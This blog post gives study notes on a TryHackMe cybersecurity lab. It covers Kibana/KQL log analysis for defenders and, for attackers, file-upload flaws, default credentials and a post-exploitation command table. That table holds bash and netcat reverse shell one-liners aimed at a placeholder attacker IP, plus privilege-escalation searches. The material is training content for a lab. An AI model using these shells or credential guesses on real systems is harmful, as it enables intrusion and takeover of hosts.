Post 63 - Twice in three days

07 Dec 2024

Task 9, Day 3 `Log analysis` Even if I wanted to go, their vulnerabilities wouldn’t allow it.

Operation Blue

Log analysis is crucial to blue-team work.

ELK: Elasticsearch, Logstash, and Kirbana

ELK combines data analytics and processing tools to make log analysis manageable. Forms dedicated stack to aggregate logs from multiple sources into central place. Today starts with Kibana Discover interface.

Index pattern: Collection of logs. Could be from single host or multiple hosts with similar purpose, i.e. web servers.
KQL: Kibana Query Language - Language for searching documents for values. Semi-similar to Splunks SPL (Search Processing Language).

Query/Syntax	Description	Example
” “	Search for specific values. Exact search.	“TryHackMe”
**	Wildcard for similar matches to value provided	United** (returns United Kingdom and United States)
OR	Shows documents that contain either value provided	“United Kingdom” OR “England”
AND	Shows documents that contain both values provided	“Ben” AND “25”
:	Search a specific field in the document. Field availability depends on fields available in document.	ip.address: 10.10.10.10

Can filter out noise by selecting/unselecting certain fields. Adding fields just applies correct KQL syntax through GUI. Can also filter specific values in fields by clicking field in left pane and adding/removing with +/-. Can click and drag on timeline to select time covered in search.

Operation Red

Unrestricted File Uploads

Without the website confirming things like file type, size, file contents it can open door for attacks on webserver.

RCE: Uploading a script that the server runs giving control to the attacker.
XSS: Uploading HTML file containing XSS code to steal a cookie and send it back to attacker’s server.

Usage of Weak Credentials

One of the easiest paths of attack is weak or default creds. Common weak.default creds attacker might try:

Username	Password
admin	admin
administrator	administrator
admin@domainname	admin
guest	guest

RCE and Web Shells

Post vulnerability exploitation commands to try:

Command	Use
ls	Gives idea of files and directories around you
cat	Outputs contents of documents like text files
pwd	Gives idea of where in system you are
whoami	Lets you know who you are
hostname	System name and potentially its role
uname -a	System info like OS, kernel version, etc.
id	Shows any groups current user is assigned to
ifconfig	Network setup info
bash -i >& /dev/tcp/<your-ip>/<port> 0>&1	Begins reverse shell via bash
nc -e /bin/sh <your-ip> <port>	Begin reverse shell via Netcat
find / -perm -4000 -type f 2>/dev/null	Finds SUID files, useful for privesc
find / -writable -type f 2>/dev/null \| grep -v “/proc/”	Find files with writable permissions

The Task

Investigate attack in Kibana to answer blues questions, then recreate attack to answer red questions. Had to watch the end of the video to get my shell going.

Recommended Stuff

Advanced ELK queries room(?).